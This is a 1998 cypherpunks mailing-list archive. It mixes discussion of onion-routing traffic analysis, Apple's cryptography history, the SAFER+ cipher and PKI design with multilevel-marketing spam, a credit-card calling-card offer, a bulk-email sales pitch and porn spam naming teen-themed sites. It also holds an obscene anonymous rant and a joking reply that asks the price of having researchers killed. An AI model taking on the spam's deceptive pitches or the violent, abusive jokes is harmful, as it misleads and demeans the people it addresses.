MAY MAIL THE LETTER TO THE ADDRESS BELOW.   AND FOR A
BETTER-THAN-RISK-FREE GUARANTEE YOU MAY KEEP ALL THE
INCENTIVES TO USE  IN YOUR NEXT BUSINESS VENTURE IF YOU
DECIDE TO EXERCISE YOUR BOOKWORM BENNY GUARANTEE
OPTION! SO WHAT ARE YOU WAITING FOR??     "GO FOR IT", YOU
HAVE NOTHING  TO LOSE!!!..........G E T     S T A R T E D     T  O D A Y!

________________________________________________________________

    DISTRIBUTOR D-4482 MAILING ADDRESS:
    WORLD DISTRIBUTION NETWORK
    3324 West University Ave. #140
    Gainesville, FL 32607-2540
    V.M.:(800-642-1202 BOX 633
     Web: http://www.freeyellow.com/members2/worldmall
    (A World Of Products Are At Your Finger Tips (TM)

***************************************************************

The World's Largest Calling Card!! (smile)

   *********$ 1 0   F  R  E  E    C  a  l  l  i  n  g  !  ! *********
   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
   YOU may Print & detach this temporary card for your conve-
  nience.Limit one card per household (Credit Card is required)
  --------------------------------------------------------------------------
   S p o n s o r e d   B y :   >   {   M  B  9  9  4  1  4  3    }
  --------------------------------------------------------------------------
  And that's not all:  NO Sign-up Fees, NO Service charges,
  Pick Your own card and PIN #s, Save up to 90% with 17c a
  minute rate, and enjoy the fastest Connection Time.  That's
  right all this and more... Any Time, All Day, Every Day.
 ---------------------------------------------------------------------------
    To Activate This card, just call: 1*800*962*2190
 ---------------------------------------------------------------------------
YOUR CARD # : [    ][    ][    ][    ][    ][    ][    ][    ][    ][     ]
Usually Your Area Code + Home Tel.No.+A Pin # (e.g.Birthdate)
 ---------------------------------------------------------------------------
 To use your card: {1} Dial 1-888-TEL-3-444 toll free. {2} Card
 No. when prompted. To place a call; For USA,  809"s, 242's, &
 Canada: Dial 1+ Area Code + Number.  For   International: Dail
 011 + CountyCode + City Code =   Number, To place another
 call: Press {#} {#} To Disconnect:  Press  {*}{*}
   <>TEL(3)TM Communications & Technology<>
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


****************************************************************

              $$$$$$$$$$$    THE BUSINES MINI-MALL     $$$$$$$$$$$


 1] http://AdNetMLM.com/2992.htm
{Turn A One-Time - $39 into $14 grant!}
2] http://members.aol.com/AJspecial4/VBN/MB-4143.html
{Email Answering Biz opp.}
3] http://www.totalmarketing.com/
{Enter code:85130 When Ordering}[10,000+ Videos & Cd-roms ]
4] http://www.freeyellow.com/members2/onlinebrochure
{Video & Cd-rom biz opp. FREE Website!}
5] http://WarriorSecrets.com/cgi-bin/warriors.cgi?5772MB
{Marketing Tools & Biz Opp.. You Are Not Going To Beleive This!!}
6] http://www.freeyellow.com/members2/homesellers/
{Sell Your Real Estate With Easy Mortgage!}
7] http://www.freeyellow.com/members2/worldmall/
{Home Mailing Biz Opp Program [HOT!!]}
8] http://www.freeyellow.com/members2/worldmall/premiumdirect.html
{Order Form-Boost Your Profits With Premiums!}
9] http://www.freeyellow.com/members2/worldmall/MortgageManager.html
{Save Thousands On Your Mortgage With This FREE Software & Service!}
10] http://www.becanada.com/$/?dnKR15
{Classified Sites Submitter 100 Software & Reseller Program! This is It!)
11] Email-On-Demand - mailto:onlinebrochure@infofree.com
{Easy Mortgage Money Consultants Wanted!}
12] http://www.freeyellow.com/members2/worldmall
{Bookworm Benny Home Mailing Program!}












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Tue, 14 Apr 1998 19:19:13 -0700 (PDT)
To: Dianne Evans <diannee@jps.net>
Subject: Re: GSM cellphones cloned
In-Reply-To: <3.0.32.19980414153441.00691a18@jps.net>
Message-ID: <Pine.BSF.3.96.980415044333.7447B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Apr 1998, Dianne Evans wrote:

> Why don't you guys write up the technical details of your hack and post
> them to the list?  Pac Bell, et all can't give you much legal trouble for
> practicing your constitutional right to free speech.  
> 	Congrats and keep up the good work!

A technical description of the attack is at
http://www.isaac.cs.berkeley.edu/isaac/gsm-faq.html

An academic paper will follow.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@webserve.net
Date: Wed, 15 Apr 1998 03:38:32 -0700 (PDT)
Subject: No Subject
Message-ID: <199804151038.GAA32046@home.webserve.net>
MIME-Version: 1.0
Content-Type: text/plain


Hello,
      There's a hot new xxx search engine in town and
we're ready for links! Tons of categories, if the category
you feel your site fits into best isn't there than drop
us a line and we'll add it (as long as it's legal). This
Search Engine has the look and feel of one of the mroe 
popular search engines, adn we're sure it will be a huge 
surfer bokmark. Check it out and add your link. MAKE SURE 
TO READ THE WEBMASTERS SECTION "BEFORE" YOU ADD YOUR LINK!

Here's the url :-)

http://www.teenagehookers.com

For those of you looking for a TRUE partnership program
backed by both RML (Ryan Lanane) And GSD (Scott Phillips
from Oink bits, Amateur Avanue, and Pink CAsh's Click Thru)
than make sure to drop by 

http://www.teennympho.com/rawclicks/pprogram.html


	Thanks For Your Time!!
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ourplaces@juno.com
Date: Wed, 15 Apr 1998 07:04:26 -0700 (PDT)
To: anyplace@juno.com
Subject: Letter From The PREZ.
Message-ID: <199804151409.GAA18808@ns1.totallink.net>
MIME-Version: 1.0
Content-Type: text/plain


More and more companies are downsizing.

More and more people are working for themselves, and many are [or want
to] work out of their homes.

There are something like 80,000,000 users of the Internet today, and the

Net is a wild, crazy ever-changing, anarchistic baby that seems to be
living in the days of the Wild West!  There are no rules, because
technology keeps changing the playing field.

So how can an individual work from home and take advantage of the Net?

Its hard.  Really hard.  If you are selling a service, or a product, and

you are not a large company, just what can you do?

Email.

Spam?  No - responsible email, with no hype, no lies, no bull.  Yes,
there are some who say that ANY form of unsolicited email is illegal.

Wrong!!!

There are no laws against bulk email so long as the message is not
fraudulent, just like regular bulk mail.

So, by using responsible email, you can reach that huge market at a
fraction of the cost of traditional bulk mail.  Less than 1/10th of a
cent per address...

We will send 100,000 pieces of email for just $99 with up to one full
page of text. The only other limitation is that it cannot be a chain
letter, pornography or hate mail.

Drop us a line at webmaster@alpha-services.com, or fax 561-835-0690, or
call 561-835-4077 and we will send complete details.

Thanks for your time.

Dave Kaplan, President
(You really didn't think this was from THE Prez, did you?)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Wed, 15 Apr 1998 09:06:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Paradoxical bandwidth 'law' with anonymizing systems?
Message-ID: <3.0.5.32.19980415090629.007b1530@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



I was reading a paper on Onion routing,  and the following occurred to me:
The FEWER people using the system, the SLOWER the system can react.

Otherwise, it leaks temporal information as a block moves from
router to router.

Longer explanation:
Onion routing provides real-time anonymized connections.  (Compare
to "mixmaster" email anonymizers which do not provide real-time
connections).  

If you are trying to avoid timing attacks in such a system,
then the fewer the people using the system,
the longer the routers have to wait, it seems to me.  Otherwise, say if you
were the only user of the system, the fact that packets ("Onions")
are being sent from router to router is easy to track.

If a lot of connections are being processed, the connections from 
router to router are difficult to trace, so the routers needn't
be concerned with imposing delays to impede time-based traffic analysis.

A possible workaround would be to place some of the routers
in time zones which would be active.  That way, even 4AM users
would get temporally anonymized by the busy routers in other zones.
I suppose this is similar to the anonymity-by-groups (e.g., using
a simple proxy) concept, where your 'group' is other users of
Onion routers.  But you can't be anonymous if you're the only one
using the chain of routers, right?


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	Steel : Meatspace :: Encryption : Virtual space

	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 15 Apr 1998 00:14:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Once upon a time...
Message-ID: <199804150714.JAA14032@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


  ...there was an invisible Dragon who was afraid to breathe fire upon
a Cocksucker who thought he was a Prince, until the Dragon could be
certain that the fairy tale would only be told by those who had learned
to fear the Dragon.
  The Dragon intercepted the Cocksucker Prince's messages and broke
open their seals, in order to search for dirt underneath the fingernails
of the writer that may have fallen into the envelope, and use it to
denigrate his character among those who clean underneath their own
fingernails before flossing at the same time every day.

  The Dragon stole the Cocksucker Prince's writing instruments and
held his couriers hostage, in order to prevent him from completing
his messages to children who still wet their bed, and explain that
when they got tired of pissing all over themselves, that they not
only had the option of pissing up the ass of the monster that was
hiding under their bed, but could also piss in the monster's ear.
  The Dragon did this because pissing up the monster's ass was a
felony, and pissing in the monster's ear was only a misdemeanor.

  The Dragon was a slow-reader and didn't understand that those who
fail to learn from the Cocksucker Prince's fairy tale past are doomed
to repeat it...

AlreadyHadACorkInMyButtBeforeTheDragonGotItsDickOutMonger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 15 Apr 1998 00:42:02 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Conspiracy Rumors!
Message-ID: <199804150741.JAA16988@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Wienke wrote:

> Proud to be a charter member of the vast right-wing conspiracy!

  Rumor has it that Ted Kaczynski was only offered his life-saving
plea bargain after your appearance in the Bay Area and your subsequent
email to Slick Willie offering to fill in for terrible ted in his
absence.
  Another rumor makes much of the fact that Netscape only backed off of
their anti-trust attack on Microsoft and went back to their roots,
providing source code to those battling against the micromonster, after
you dumped their browser in favor of billybeast's exploiter program.

  Other rumors make much of the fact that the Anthrax Twins were 
arrested shortly after you left Las Vegas and met with the guitar
player for Linda Lou & the Drifters, who just happens to do the
electrical work for the Biosphere project outside of Tucson...a 
perfect environment for researching biological warfare delivery
systems.

IKnowWhoYouREALLYAreMonger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 15 Apr 1998 19:23:18 -0700 (PDT)
To: John Young <cypherpunks@toad.com
Subject: Re: Denning 98
In-Reply-To: <199804101345.JAA24653@camel14.mindspring.com>
Message-ID: <3.0.5.32.19980415095729.008809f0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:45 AM 4/10/98 -0400, John Young wrote:
>Dorothy Denning's Spring 98 course schedule provides an informative
>overview and recommended readings:
>
>   Information Warfare: Terrorism, Crime, National Security
>
>   http://guru.cosc.georgetown.edu/~denning/cosc511/spring98/schedule.html
>
So is there a lab, or is it classroom-only?  :-)

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 15 Apr 1998 01:46:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: GSM cellphones cloned---Threats?
Message-ID: <199804150846.KAA24019@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
 
> Watch out, though, that the corps don't decide it might just be cheaper in
> the long run to just pay the 10 grand to have Ian and Dave and yourself
> whacked.

Do you have a phone number?
Is that 10 grand plus expenses?

Just wondering.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Altenberg <mark@altenberg.com>
Date: Wed, 15 Apr 1998 12:08:52 -0700 (PDT)
To: Robert Hettinga <dcsb@ai.mit.edu
Subject: Re: Apple crypto engineer position available
In-Reply-To: <v04003a3db1592fd8d804@[17.205.41.147]>
Message-ID: <v03102802b15a94e1e66e@[204.179.135.142]>
MIME-Version: 1.0
Content-Type: text/plain


On 4/14/98, Robert Hettinga blathered on like this:

>...Hint 1: Whatsisname Sidhu,
>
>who negotiated the world's first RSA license, and who probably could have
>invented digital commerce on the internet all by himself if he only knew
>what he had, already bought and paid for, wasted in a mail and LAN
>protocol, buried in the bowels of the MacOS...

>...Anyway, a more clueful Sidhu, (who, to be fair, couldn't have understood
>what was coming) could have, with just a little of the right prompting :-),
>taken some of the money you guys gave to, say, Steve, for instance :-), and
>bought the blind signature patent at firesale prices from DigiCash ($10
>million is chump change, even to Apple, even then, :-)) at last year's
>greater-fools exchange of ownership at "the world's greatest financial
>cryptography company" (my name, not theirs)....
>

Quite amazing to look at all of the innovation that went on at Apple and
wonder what could have been. From my perspective, the big mistake with
Apple's first implementation of crypto was that it was part of an
architecture (yep, PowerTalk). After close encounters with this and other
wonderfully "flexible architectures", I've learned (the hard way) that this
is one of the best oxymorons in computerdom. Architectures seem like
wonderful, grandiose ways to solve a bunch of problems at once, but they
usually lead a Titanic-like existence, eventually sinking into the abyss
and taking almost everything with it, including products, businesses,
reputations - you name it.

Well, an amazing thing happened. Just before PowerTalk started taking on
serious water, someone managed to throw DigiSign (Apple's digital signature
technology based on RSA public keys) into its own life boat; Apple actually
built a separate library for DigiSign that didn't require PowerTalk. But,
unfortunately, there was leak in this boat, too. You see, the model for
DigiSign's certificates was based on a heirarchy and required a certificate
authority and all of the requisite infrastructure. No one had really done
this yet so Apple had to do more than create DigiSign and put it into the
Mac OS - they had to get this infrastructure in place, too.

Now, even though Apple had the help of RSA and BBN, there was this even
bigger problem of just helping people get it. The best way to help people
understand technology is to make it accessible so almost anyone can play
with it and use it. This is what Apple is known for - making technology so
accessible that people just go nuts, doing things with it and taking it
places no one ever dreamed. That's how Apple catalyzed the transformation
of the publishing industry. Requiring a CA to make DigiSign work simply
made this impossible. A peer to peer model, allowing people to create and
sign their own certificates would have been far more appropriate for
Apple's creative users.  Then came PGP...

C 'est la vie!

Mark
----
mark@altenberg.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pablo Calamera <pablo@microsoft.com>
Date: Wed, 15 Apr 1998 12:31:27 -0700 (PDT)
To: "'Robert Hettinga'" <dcsb@ai.mit.edu>
Subject: RE: Apple crypto engineer position available
Message-ID: <AF4C1F8C5306D111AD5F0000F8662ED306287162@red-msg-41.dns.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Bob,

In general I agree with your points however your historical perspective on
Apple Crypto is far from complete.  You forgot to mention that while Apple
was flailing there where key people who actually did crypto work and managed
to ship great products inspite of Apple.  Those same people tirelessly tried
to evangelize/evolve the technology within Apple to no avail.  We're talking
pre-Vinnie and pre-Jon here.  And in Gursharan Sidhu's defense, he knew
exactly what he had when we got the RSA license!

Pablo Calamera
Security Architect
WebTV Networks, Inc.
voice: 650-614-2749
fax: 650-614-6442


-----Original Message-----
From: mac-crypto@vmeng.com [mailto:mac-crypto@vmeng.com]On Behalf Of
Robert Hettinga
Sent: Tuesday, April 14, 1998 7:00 PM
To: Mac-crypto@vmeng.com; net-thinkers@vmeng.com; cypherpunks@toad.com;
cryptography@c2.net; dcsb@ai.mit.edu
Subject: Re: Apple crypto engineer position available


Please note, this is *not* a flame. I'm not getting even *slightly* warm,
here... :-).


At 6:20 PM -0400 on 4/14/98, Somebody, Waay Up There at Apple, wrote to me,
offline:

> I don't get it.

Yup. The old irony meter is pegged, alright...

:-).

> >At 12:00 PM -0400 on 4/14/98, Mike Barnick wrote:
> >
> >
> >> Apple is looking for a senior engineer to work on providing
cryptographic
> >>APIs on the operating system.
> >
> >:-).
> >
> >I see the law of conservation of irony still holds...
> >
> >Cheers,
> >Bob Hettinga


Tell ya what, Somebody, I'll give you three hints:

Hint 1: Whatsisname Sidhu,

who negotiated the world's first RSA license, and who probably could have
invented digital commerce on the internet all by himself if he only knew
what he had, already bought and paid for, wasted in a mail and LAN
protocol, buried in the bowels of the MacOS.

We still haven't seen what's in that RSA license to Apple, but, given RSA's
financial straits at the time the license was issued, I bet it reads more
of a pornographic act than a legal agreement. :-). I for one would be
interested how transferrable it *still* is. Like, if Apple builds a Mac
crypto toolbox, does that mean that anyone writing code using the crypto
toolbox has a license to use the algorithms therein? I bet so, but the
world will never know. The technology, (RSA, anyway) has a countdown clock
on it now, so it's almost moot. Don't even get me started on ECC, which is,
of course, marvellous, but equally squandered.

Anyway, a more clueful Sidhu, (who, to be fair, couldn't have understood
what was coming) could have, with just a little of the right prompting :-),
taken some of the money you guys gave to, say, Steve, for instance :-), and
bought the blind signature patent at firesale prices from DigiCash ($10
million is chump change, even to Apple, even then, :-)) at last year's
greater-fools exchange of ownership at "the world's greatest financial
cryptography company" (my name, not theirs).

Heck, if Apple had bought DigiCash outright, and just *fired* everybody,
and only used the *technology* (kind of dumb to fire David Chaum, but, hey,
it's my limb, and I'm not coming off of it), Apple could have put blind
signatures into that Macintosh crypto tool box, and the world really
*would* think differently. :-).

That's because, someday sooner than most people think, all these
cryptographic functions, particularly the financial crypto functions like
blind signatures, and probably even something like MicroMint, will be
buried deep in every operating system. Apple could have had crypto for the
rest of us, same as it ever was, way ahead of schedule, same as they always
do. But, no, they fired Sidhu, instead. Causing his whole staff, and every
crypto-clueful person at Apple, to quit in disgust. :-).

What's funny is, Apple *still* has this enormous competitive advantage if
they still want it. Because, even though they're goliath, Microsoft can't
do crypto very well right now. They've got this homunculus called the
Justice Department's antitrust division sitting on their sholder, and they
don't want to do anything to upset Dammit Janet. (I immediately have this
ludicrous picture my head of Ms. Reno in wet underware, with Riff Raff
[Carville, right?] leering at her.) Not to mention the Wrath of the Whole
Rest of the Computer Business, voted through their pocketbooks on capital
hill. ;-). Actually, Microsoft's trying to do strong crypto anyway, bless
their hearts, but they're not going to do it for long, given all the flying
monkeys headed in their general direction.

Fortunately, compared to the antitrust division and their minions, the FBI
is a mere gnat's fart, believe it or not.

That's because, to torture dear Mr. Wolfe, "no Buck Rogers, no bucks":
Digital Commerce *is* Financial Cryptography, and all that. So, all it
really takes from Apple to have this huge advantage, crypto-wise, is for it
to have more cajones than grey matter, which, unfortunately, is exactly the
inverse problem at 1 Infinite Loop, the last I looked. Apple being a
founding signatory to the Key Recovery Alliance Program is a marvellous
example of that. Look, it's a complement, okay? You're *smart*, right? You
just have no --, well, anyway, on to the next hint...


Hint 2: Jon Callas,

who was not only CTO for PGP, but, through being both clueful and at the
right place the right time, ended up CTO for all of Network Associates. NA
is now (or will be soon, after the TIS merger's done) the 900-lb
cryptogorilla nobody's supposed to think about, but can't get out of their
minds.

Of course, this is the same Jon Callas who used to work for the
aforementioned Sidhu, and who, for fun one day, thought up a really
*really* spiffy, rock-solid way to extract real live entropy from the
normal operation of any Macintosh. And I don't mean memory conflicts
either. :-)

What? What's entropy? Hmmm... Well, there's this book you can read, it's
called "Applied Cryptography". It's by a former Mac maven named Bruce
Schneier. You might want to look it up there.  Entropy, of course, brings
me to the the final hint,


Hint 3: Vinnie Moscaritolo,

the guy whose name is written all over Apple's new job discription for a
crypto engineer. The guy who now works for Jon over at PGP-now-NA. Vinnie,
who, while he was at Apple Developer Technical Support last year, asked you
guys to set up a crypto engineering department, not to mention a crypto
toolbox, not to mention a crypto API. Who left in disgust shortly after the
aforementioned Sidhu, but not because you fired Sidhu, because, in typical
Vinnie fashion, he practically venerated Sidhu's clueness about commerce,
because Vinnie saw it as an opportunity (Marines are wierd that way). :-).
Who is probably making waay too much money to come back now, and who would
have probably taken a pay *cut*, even at *DTS* salaries, to do the job had
you offered it to him even a year ago.


Ironic, isn't it?



In the final bit of irony, Somebody Else, in Apple Evangelism at the time,
who was not even especially crypto-clueful back then, and who will also
remain nameless :-), once bandied about the idea of an actual crypto
*evangelist* at Apple. Maybe even a digital commerce evangelist, who, of
course, would be one and the same (digital commerce being financial
cryptography and all).

The irony there is that said evangelist, if hired, would end up spending
all his time evangelizing *Apple*, and not the developer community, who of
course, are clueful and don't need evangelizing about such things.  Such
are things at the new Apple, I guess.

Of course, Somebody Else also doesn't work at Apple anymore either. He
works in, you guessed it, another financial cryptography company. I even
yelled at him about his antics at Apple, even though he's not there
anymore, while we were at the Hansa Bank party at Serenity during FC98 on
Anguilla this year. :-).

Now, what I said *then* was a flame, you better believe it, because back
*then*, when Somebody Else was at Apple, it cost me actual money.

This time, with you, Somebody, it's free of charge, and so I'm not nearly
so worked up.


Cheers,
Bob Hettinga

PS. To save you the cost of a white paper, Somebody, or maybe you can just
pay us for it, already :-), go look at "Digital Commerce for the Rest of
Us", a longish rant Vinnie and I wrote almost two years ago. For some
strange reason, it's still pretty current. ;-).

It's at <http://www.shipwright.com/rants/rant_15.html>

Raines Cohen actually moshed it a bit and stuck it into the inaugural issue
of NetProfessional magazine, god rest it's soul, so you might have seen
some of it there as well.




-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Wed, 15 Apr 1998 13:04:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cylink Corporation to Submit SAFER+
Message-ID: <3.0.5.32.19980415130514.007a1e40@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



http://www.newspage.com/cgi-bin/NA.GetStory?story=b0414070.403&date=19980415
&level1=46545&level2=46549&level3=626

Cylink Corporation to Submit SAFER+
Algorithm to the National Institute of
Standards and Technology 

April 15, 1998


SUNNYVALE, Calif.--(BUSINESS WIRE) via NewsEdge Corporation -- 

Non-Proprietary, Royalty-Free Algorithm will be Evaluated 

as a Replacement for Current Data Encryption Standard 

Demonstrating once again its commitment to deliver freely available encryption
technology to the market, Cylink Corporation (NASDAQ:CYLK), a pioneer in
commercial
cryptography, today announces it plans to submit the SAFER+ algorithm to
the National
Institute of Standards and Technology (NIST). 

NIST is reviewing encryption algorithms that will replace the current Data
Encryption
Standard (DES) which has been used for more than 20 years. The new standard
is called
AES, or Advanced Encryption Standard. The evaluation will take
approximately two
years. 

SAFER+ is a royalty-free, non-proprietary encryption algorithm. Developed by
world-class and world-wide cryptographers, SAFER+ is an enhancement of SAFER,
which was first published in 1993. Since then, SAFER survived the scrutiny
of many of
the world's top cryptographers. Built on the proven track record of SAFER,
SAFER+ is
designed to meet the next generation of security requirements. Cylink
estimates SAFER+
to be five times faster than DES, and ten times faster than Triple-DES. 

"Once again, Cylink is delighted to offer break-through technology to NIST
and the
information security community," said Chuck Williams, chief scientist at
Cylink.
"SAFER+ is the most recent example of our legacy of pioneering the use of
cryptography in practical business solutions, including public key, SAFER,
triple-DES,
key recovery." 

SAFER was originally developed by Professor James Massey, a Cylink founder,
and
funded by Cylink. SAFER+ was sponsored by Cylink and jointly developed by
Massey
and Dr. Lily Chen, chief cryptographer at Cylink Corporation. 

Cylink is recognized as a pioneer in commercial cryptography since its
commercial
implementation of Diffie-Hellman public key management in 1984. It has: 

-- Developed the first public key management co-processor application specific
integrated circuit (ASIC) for public key management acceleration; 

-- Brought to market the first triple DES (data encryption standard)
encryption algorithm
ASIC, and the first high-speed triple DES encryptor. 

-- Introduced several new products including a certificate-based access
control system,
a certificate-based LAN security system, and the world's first asynchronous
transfer
mode (ATM) cell encryptor. 

About Cylink and Algorithmic Research 

Cylink Corporation and its wholly owned subsidiary, Algorithmic Research,
are leading
providers of encryption-based network security solutions. Their products
enable the
secure transmission of data over networks, including local-area networks
(LANs),
wide-area networks (WANs), and public packet-switched networks such as the
Internet.
Cylink and Algorithmic Research serve Fortune 500 companies, multinational
financial
institutions, and government agencies worldwide. For more information,
visit our web
sites at http://www.cylink.com and http://www.arx.com. 

------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	Steel : Meatspace :: Encryption : Virtual space

	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Illuminatus Primus <vermont@gate.net>
Date: Wed, 15 Apr 1998 11:51:03 -0700 (PDT)
To: David Honig <honig@alum.mit.edu>
Subject: Re: Paradoxical bandwidth 'law' with anonymizing systems?
In-Reply-To: <3.0.5.32.19980415090629.007b1530@otc.net>
Message-ID: <Pine.LNX.3.96.980415141940.2023F-100000@oto.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Another way to defeat traffic analysis is to maintain a constant stream of
traffic between servers, some of which is noise.. Only someone with the
decryption key would be able to determine which is noise and which is
signal (hopefully).  Pipenet's description involved this constant stream.. 
It may have been one of the resource-consuming aspects that the designers
of onion routing wanted to get rid of.

I have been thinking of anonymous packet resenders recently, and one of
the problems that confronted me was that regardless of how much encrypted
traffic goes between the resender systems, an organization with enough
resources could watch for "unknown" incoming connections at each of the
known resenders and match that with the outgoing connection if there
aren't too many people connected.. The organization could even force some
type of DOS on the incoming connections until the outgoing connection also
dropped (revealing the sender's identity), although I suppose the outgoing
packets could continue to be sent by the resenders in the case of a
dropped connection.  Putting the right stuff in the packets would be
difficult, though. 

To make it more difficult for such an organization to discover a sender's
identity, I thought that if anonymous connections could not be depended on
to be numerous enough, the entry points to the resender system could also
maintain popular web/ftp/mail sites which accepted requests with hidden
packet transmission requests.  Of course, this would make packet
sending/receiving very expensive, and the increased traffic coming from
one IP and destined to mostly anonymous resenders might make it stand out
from the regular connections.. but the identity tracker's job has been
made harder (since he must analyze large amounts of incoming traffic), and
the entry points to the resender system can be said to receive mostly
"innocent" data.

Any comments/ideas?

On Wed, 15 Apr 1998, David Honig wrote:

> 
> I was reading a paper on Onion routing,  and the following occurred to me:
> The FEWER people using the system, the SLOWER the system can react.
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip Hallam-Baker" <hallam@ai.mit.edu>
Date: Wed, 15 Apr 1998 13:11:30 -0700 (PDT)
To: "Mark Altenberg" <dcsb@ai.mit.edu>
Subject: RE: Apple crypto engineer position available
In-Reply-To: <v03102802b15a94e1e66e@[204.179.135.142]>
Message-ID: <000801bd68a9$ef24f3e0$06060606@russell>
MIME-Version: 1.0
Content-Type: text/plain



> Now, even though Apple had the help of RSA and BBN, there was this even
> bigger problem of just helping people get it. The best way to help people
> understand technology is to make it accessible so almost anyone can play
> with it and use it. This is what Apple is known for - making technology so
> accessible that people just go nuts, doing things with it and taking it
> places no one ever dreamed. That's how Apple catalyzed the transformation
> of the publishing industry. Requiring a CA to make DigiSign work simply
> made this impossible. A peer to peer model, allowing people to create and
> sign their own certificates would have been far more appropriate for
> Apple's creative users.  Then came PGP...

I think Mark makes a mistake in confusing pre-conditions for market
acceptance with requirements for market growth.

>From the perspective of someone who helped the Web grow from a userbase
of less than 100 users I have my own ideas as to why Apple did not
succeed with its powertalk architecture. I see the lack of commitment
to open standards as the key factor.

Consider the attractiveness of a communications system that only
communicates from one Mac to another. Today that might be just about
adequate for many people's needs, after all the PowerMacs are
quite powerful. Back in 1990 however the Mac platform was a rather
weedy 68000 with an operating system that was very expensive to
develop for and a relatively small market share.

If you had a power hungry application in 1990 you had to get a RISC
processor which in turn meant like it or not you had to use UNIX
(or VMS). Standardising on a Mac only platform just was not going
to happen regardless of how great the software was.


To the extent that requiring a CA meant higher startup costs the
powertalk architecture was flawed. The problem had always been a
chicken and egg situation in which PKI applications could not
take off without a CA and CAs could not take off without successful
PKI applications.

PGP cut the gordian knot and demonstrated that it was _possible_
to have a successful PKI application without a CA. But that is not
to say that a trusted third party cannot add value to an
application. PGP validated PKI generally but it did not invalidate
the CA concept - in the PGP system everyone is a trust provider,
everyone is in that sense a CA.


But just because CAs may be dispensed with in a system of 10,000
odd users whose principal concern is confidentiality does not mean
they have no role in a system of over 1 million users where the
legal enforceability of a signed contrat is an issue.

Consider as an example the case in which there are 1,000,000 users
and people generally prefer certificate chains to be no longer than
three people. That can only be achieved if either people on average
sign 100 keys or some people sign a great number of keys (thousands).
In my book anyone who is signing over 1000 keys had better have
a pretty decent idea of what they are doing and should probably
think of themselves as a CA.


The other shortcomming of Apple's approach was not realising
that there is a middle ground. To take an example most people
think of VeriSign as a CA because of our public CA business
(Server certificates, S/MIME certificates). A lot of people who
spend a lot of energy blasting our business model don't realise
that our enterprise offering, OnSite is a product which allows
other people to set up their own CA outsourcing the expensive
to implement Issuing Authority functions rather than handing
over control of their enterprise to us.

It is true that if folk want to issue certificates which are
incorporated into the VeriSign public hierarchy we insist on
certain contractual undertakings from them (i.e. if they issue
a certificate to Fred Bloggs they take the same steps we would
to check it really is Fred Bloggs).


We have already got to the point where we have proved the
viability of PKI generally. The question to ask is not what
are the preconditions for establishing PKI but how can we
grow the PKI market best?


In short Apple's plans were not too crazy from the perspective
of where they wanted to get. The fault lay in not understanding
how the market could get from where it is to where they thought
it should go. They failed to understand that communications
products can only be successful as genuinely open standards with
ubiquitous support. They saw the Powertalk architecture as a
means to sell more Macs, not as a business in itself.


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Altenberg <mark@altenberg.com>
Date: Wed, 15 Apr 1998 16:37:46 -0700 (PDT)
To: <dcsb@ai.mit.edu>
Subject: RE: Apple crypto engineer position available
In-Reply-To: <v03102802b15a94e1e66e@[204.179.135.142]>
Message-ID: <v03102805b15ae9316009@[204.179.135.142]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:06 PM -0700 4/15/98, Phillip Hallam-Baker wrote:
>> Now, even though Apple had the help of RSA and BBN, there was this even
>> bigger problem of just helping people get it. The best way to help people
>> understand technology is to make it accessible so almost anyone can play
>> with it and use it. This is what Apple is known for - making technology so
